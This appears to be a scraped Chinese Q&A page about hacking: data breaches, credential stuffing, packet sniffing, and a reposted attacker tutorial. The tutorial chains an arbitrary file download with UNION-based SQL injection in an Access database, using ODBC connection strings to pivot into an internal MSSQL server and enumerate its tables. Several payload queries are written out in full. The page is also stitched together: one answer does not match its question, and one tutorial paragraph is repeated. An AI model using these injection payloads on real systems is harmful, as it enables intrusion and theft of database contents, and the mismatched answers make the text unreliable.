为什么黑客可以利用撞库手法获取用户的数据

撞库是黑客最常用的窃取个人信息的手法，近年来，大规模的个人身份泄漏已经发生多起，个人信息安全问题已经刻不容缓。解决办法是完善账户资料，完善各项安全措施，定期修改密码。

麦当劳部分数据遭黑客窃取，信息被盗对消费者会造成什么损失？

随着大数据时代的来临，我们想要保护自己的个人信息本身就变得越来越困难，人们在想方设法的保护司机的隐私。APP已经不可信了，人们只好将希望寄托在手机本身。但是在如此关键的时刻苹果被曝光存在这么严重的问题，可谓是雪上加霜，这显然会对其新品的销量造成很大的影响。

可口可乐公司遭黑客入侵，161GB数据被窃取，黑客意欲何为？

想窃取商业机密，同时也想了解可口可乐的制作配方，目前具体原因还在调查过程中，窃取了161GB的内存和数据，出售的价格是6.4万美元。

黑客如何通过Access来获取MSSQL数据

首先说明一点，这个方法很早就有了，不过用时大概在脑袋里沉寂太久，已经处于忘却状态。感谢Trace提供资料。经常会遇到任意文件下载漏洞，一般处理的方法是把数据库连接文件下载回来，然后远程连接上。

首先说明一点，这个方法很早就有了，不过用时大概在脑袋里沉寂太久，已经处于忘却状态。感谢Trace提供资料。

经常会遇到任意文件下载漏洞，一般处理的方法是把数据库连接文件下载回来，然后远程连接上去。最理想的状态莫过于MSSQL和MYSQL，尤其是在数据库和WEB不分离的情况下，备分SHELL，导出SHELL，可以用的方法很多。

不过要是数据库和WEB分离，而且数据库在内网不可上网，或者有防火墙等等 其他手段使得我们无法连上远程数据库时，不妨假设的再艰难一些，甚至无法找到一个mssql注射点时，很多情况下通常会束手无策。

这里以 MSSQL为例子，很凑巧找到一个任意文件下载漏洞，直接下了WEB.CONFIG回来看，发现数据库在内网，找了半天没找到注射点，稍微旁注一下，有一个站，可惜是ACCESS数据库。猜不到表和后台。不过目标站的后台是知道的，然后准备从这个access注射点读出目标站管理员帐户。直观一些，下面直 接给出我本地测试结果：

弄的简单一点，就3个字段，ID，XM，XB，ID数字型，后面2个字符型。

假设存在漏洞的文件中，执行SQL语句 select * from test whrere id = 1

这里有3个字段，我们用UNION联合查询给他匹配一下就是(黑盒操作时用order by 或者穷举来确定字段个数)

SELECT * FROM test where id=999999 union Select top 1 1，2，name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].ku

这里的master库中我建立了一个名为KU的表，上面这个查询语句中，由于id=999999不存在，在联合查询的作用下，web上原本显示access数据库内容的位置显示出了我们构造的UNION查询结果，name字段处于一个字符型的显示位置。

ku这个表里的name字段内容就会被显示在web上相应的位置，不过这个显然不是我们想要的，我们要的是整个表的结构和内容，以master为例子，这里是模拟的结果，事先我已经知道master的结构，待会方便和结果比对校验是否有错。

SELECT * FROM test where id=999999 union Select top 1 1，2，table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables

这样master库的第一个表名就出来了。

获得后面的表名也很简单。

SELECT * FROM test where id=999999 union Select top 1 1，2，table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables where table_name not in (select top 1 table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=****;DataBase=master].information_schema.tables

以次类以常规方法推取得字段名和字段内容，代码烦琐自行研究下。

黑客是怎么截取数据包的?

首先，黑客要知道你电脑的IP地址，知道你在哪里。当然，你的电脑要上网

找到你的IP之后就确定了你的电脑网络位置，之后寻找你可以侵入的端口。

我们电脑连接网络的时候很多端口是没用的，如打印机端口什么的，有些端口很容易被入侵占用

选择可以入侵的端口之后就开始入侵，这个时候你电脑的进程里面就有个不正常的进程，不过你很难发现。

之后就可以监听你的电脑，就是你每一个动作都可以显示，之后用专门的抓包软件进行抓包。

黑客是怎么把网络里的数据截取的呀？

黑客不在这里回答问题的，亲。我觉得你可以恶补一下关于抓包的相关网络知识。首先你要知道包里都有什么才行。因为代码的某一段都会有类似于协议的相关代码，通过破解加密，得到包内的信息。